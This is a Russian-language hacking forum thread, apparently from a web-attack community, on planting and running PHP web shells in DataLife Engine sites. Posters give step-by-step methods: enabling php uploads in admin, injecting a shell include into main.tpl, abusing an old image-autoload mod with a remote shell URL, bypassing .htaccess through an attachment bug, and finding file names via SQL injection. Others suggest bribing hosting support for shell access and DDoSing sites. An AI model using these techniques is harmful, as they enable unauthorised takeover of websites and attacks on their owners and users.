Решил отписать статью со всеми мне известными способами заливки и исполнения шеллов в движке DataLife Engine


Некоторые способы работают на одном или ином движке, некоторые на всех.
Если не получилось так, то пробуйте иначе.

Начну я со способов с доступом к админке.

Первый способ!

Идём в настройки системы - выбираем настройки по загрузке файлов (ищите там где картинки сверху настроек и ниже меню админки) и вписываем в строку разрешенных файлов для загрузки php.
Сохраняем.

Дальше идём в добавление новости, заливаем шелл. И вставляем в новость слово типа [attachment.....] берём его в теги [attachment]
Нажимаем кнопку "Предварительный просмотр" и видим адресс шелла.


Второй способ!

Идём в админку - шаблоны - и вставляем в main.tpl к примеру
{include "shell"}

Идём на сайт и быстро делаем свои дела.

Или же если есть доступ в login.tpl
Вставляем код шелла прямо в него.


Третий способ может использоват и с админкой и с правами журналиста.

Сейчас популярен мод автозагрузки картинок на сайт.
И на 30% сайтов стоит старая версия мода, в которой нет проверки формата.
Т.е. мод работает так:
Все файлы/картинки что в тегах и находятся на стороннем домене автоматом идут на сервер.

В старой версии, хватает сделать так:
адресс шелла и добавить новость.
Дальше идём в новость и смотрим адресс шелла.


Ну и наверно последний способ, сам по себе не связан с багами .

Идёте в whois сервис. Пробиваете dns сервера желаемого сайта.
Обычно это
ns1.hosting.ru

Идём на *hosting.ru и узнаем аську какого нить стороннего саппорта.

Стучим ему, даём 10$ и получаем шелл ;)
ЗЫ я так нашёл 30 хостингов с таким саппортом.
50% сайтов...

Вспомню способы, добавлю тут
Кому помогло, не откажусь от «+»!

P.S.Модеры , эта тема нужна чтобы в теме с багами dle по 100 раз не спрашивали о заливке шелла!

Если вы хотите убить dle сайт.

делаем это с 5 дедов на которых стоит программа sprut ddos
большинство хостингов блокируют сайт за нагрузку.

а сам дле дает приличный вес.

а в дле с статусом радактор мойно залить шелл ??

Да. смотри 1 пост. там где о моде с автозаливкой

ты опять за старое

Сорь, там в 1 посте ошибка.
инклуд вот такой:
{include file="shell"}

ты опять за старое
Зы чтото не нравится - не читай.

в теме о дле, раз 50 о шеллах спросили.

Статья ***ня.

Сорь, там в 1 посте ошибка.
инклуд вот такой:
{include file="shell"}
а что такое "shell"? Покажи готовый пример для использования.

заливаете шелл, идем на него.
видим что открыть шелл нам запрещает добрый htaccess.
эту проблемму решаем инклудом.
{include file="uploads/images..shell.php"}
вставляем эту строку в шаблон через админку.

идём в шелл через сайт, удаляем htaccess и потом удаляем инклуд.


теперь нам не мешает хтассесс в директории шелла. т.е. мы используем инклуд для импорта шелла в код main чтобы удалить мешающий нам хтассесс

заливаете шелл, идем на него.
а как ты заливаешь шелл в папку uploads? Ты сам пробывал это сделать?

Да.
читай первый пост как заливать.
как-бы нужна админка
sundown залил и проинклуди4

заливаете шелл, идем на него.
видим что открыть шелл нам запрещает добрый htaccess.
эту проблемму решаем инклудом.
{include file="uploads/images..shell.php"}
вставляем эту строку в шаблон через админку.

идём в шелл через сайт, удаляем htaccess и потом удаляем инклуд. проверил в DLE 8.3 - неработает...

Радиус действия инклуда
dle 7.5-8.2
написано же, на некоторые способы идут отдельные движки

Да. смотри 1 пост. там где о моде с автозаливкой

как то не понел тебя

В 1 посте описан способ заливать шелл с правами журналиста

в статусе редактор не бивает такие доступи

там доступа и не надо.
надо лишь права добавления новости без модерации

est u menya prava dobavlyat novsti..

вот посмотри например..
вот адрес шелл:http://ermeninisikim.narod.ru/c100.php
и я добавляю или редакторию новост и зделаю так :
[img*]http://ermeninisikim.narod.ru/c100.php[/img*]

и потом если посмотрю адрес шелл-а и вию :

http://ermeninisikim.narod.ru/c100.php

вот посмотри например..
вот адрес шелл:
и я добавляю или редакторию новост и зделаю так :
[img*]http://ermeninisikim.narod.ru/c100.php[/img*]

и потом если посмотрю адрес шелл-а и вию :

http://ermeninisikim.narod.ru/c100.php
Я ниче не понял.
зы это вродь не dle двиг

не понел ??
вот адрес моy шелл :http://ermeninisikim.narod.ru/c100.php
сам написал адрес шелла вставим в и потом посмотрим в саyте адрес шелл-а..
коqда посмтрю в саыте ноvosтях адрес шелл-а увиju :http://ermeninisikim.narod.ru/c100.php

i 4to zdelat ??

Там не движок dle
пишы понятнее

как на народе дле?
ахахаха
это он те ссылку на шелл показывает а не на дле..

И вставляем в новость слово типа [attachment.....] берём его в теги [attachment]
Нажимаем кнопку "Предварительный просмотр" и видим адресс шелла. когда заливал шелл через DLE такой финт ни разу не работал. Повезло тем, что был доступ к БД через sql-inj, там прочитал имя загруженного файла из таблицы dle_files.
Идём в админку - шаблоны - и вставляем в main.tpl к примеру
{include "shell"}
Идём на сайт и быстро делаем свои дела. DLE запрещает инклудить файлы из директорий с правами 777 так что тут ничего не получится разве что на венде этот ваш DLE поставлен
обратиться к шеллу напрямую(повторю, я выдрал его имя из БД) мешает .htaccess в корне директории files. Я сделал следующий ход:
- в настройках разрешил аплоад файлов с расширением htaccess
- приаттачил к новости файл .htaccess (в формочке с именем "uploads/files/ " надо указать тоже .htaccess). Из-за бага приаттаченый файл оказывается не тем, что я аплоадил а "истинным" .htaccess
- просто удаляю аттач и .htaccess'а как и не бывало. Могу напрямую обращаться к шеллу как-то так:
http://site.com/uploads/files/12345_shell.php

когда заливал шелл через DLE такой финт ни разу не работал. Повезло тем, что был доступ к БД через sql-inj, там прочитал имя загруженного файла из таблицы dle_files.
DLE запрещает инклудить файлы из директорий с правами 777 так что тут ничего не получится разве что на венде этот ваш DLE поставлен
обратиться к шеллу напрямую(повторю, я выдрал его имя из БД) мешает .htaccess в корне директории files. Я сделал следующий ход:
- в настройках разрешил аплоад файлов с расширением htaccess
- приаттачил к новости файл .htaccess (в формочке с именем "uploads/files/ " надо указать тоже .htaccess). Из-за бага приаттаченый файл оказывается не тем, что я аплоадил а "истинным" .htaccess
- просто удаляю аттач и .htaccess'а как и не бывало. Могу напрямую обращаться к шеллу как-то так:
http://site.com/uploads/files/12345_shell.php
незнаю как сейчас,но раньше просто антивирусник в админке запускаеш,и видеш адрес шелла.

незнаю как сейчас,но раньше просто антивирусник в админке запускаеш,и видеш адрес шелла.
Для этого добавляешь файл шелла в доверенные.

Для этого добавляешь файл шелла в доверенные.
Омг,я объясняю как его найти, с каким именем он залился)

Омг,я объясняю как его найти, с каким именем он залился)
Да я понел.

зы в дле 8.3 баги с атачом нет.

шяс разве что ломать длехи выше 8.3, можно будит лишь с помощю модулей и хаков...

дле становится совершенным...
Потому я думаю что дле остановится на разработке 10-ой версии.

ХЗ почему, но не получается залить. DLE7.5- разрешаю аплоад и php. и phtml но он всё равно не даёт загрузить с расширением php. Пробовал через {include file- но стоит запрет на изменение шабов.
Сейчас висит 4 длеехи и ничего нельзя сделать, с админскими правами.

Шелл залил, а вот когда пытаюсь заинклудить в main.tpl шелл выдает такую ошибку вверху:
Warning: fopen(/var/www/****/data/www/***/templates/Default/main.tpl): failed to open stream: пФЛБЪБОП Ч ДПУФХРЕ in /var/www/****/data/www/****.com/engine/inc/templates.php on line 174 Warning: fwrite(): supplied argument is not a valid stream resource in /var/www/****/data/www/****.com/engine/inc/templates.php on line 175 Warning: fclose(): supplied argument is not a valid stream resource in /var/www/****/data/www/****.com/engine/inc/templates.php on line 176 Warning: fopen(/var/www/****/data/www/****.com/templates/Default/vote.tpl): failed to open stream: пФЛБЪБОП Ч ДПУФХРЕ in /var/www/****/data/www/****.com/engine/inc/templates.php on line 174 Warning: fwrite(): supplied argument is not a valid stream resource in /var/www/****/data/www/****.com/engine/inc/templates.php on line 175 Warning: fclose(): supplied argument is not a valid stream resource in /var/www/****/data/www/****.com/engine/inc/templates.php on line 176 Warning: fopen
(это кусок примерный, там еще его продолжение на страницу) ну и говорит что настройки сохранены, возвращаюсь, смотрю код, а инклуда нету. Видемо права стоят не 666...
есть идеи?

возвращаюсь, смотрю код, а инклуда нету
Ничего не сделаешь с шаблоном. Там в код кто-то влез. У самого пару таких сайтов валяется.

не имея доступа в админку на ДЛЕ 8.3 как можно залить шел?

- в настройках разрешил аплоад файлов с расширением htaccess
- приаттачил к новости файл .htaccess (в формочке с именем "uploads/files/ " надо указать тоже .htaccess). Из-за бага приаттаченый файл оказывается не тем, что я аплоадил а "истинным" .htaccess
- просто удаляю аттач и .htaccess'а как и не бывало. Могу напрямую обращаться к шеллу как-то так:
http://site.com/uploads/files/12345_shell.php

Спасибо. Очень помог.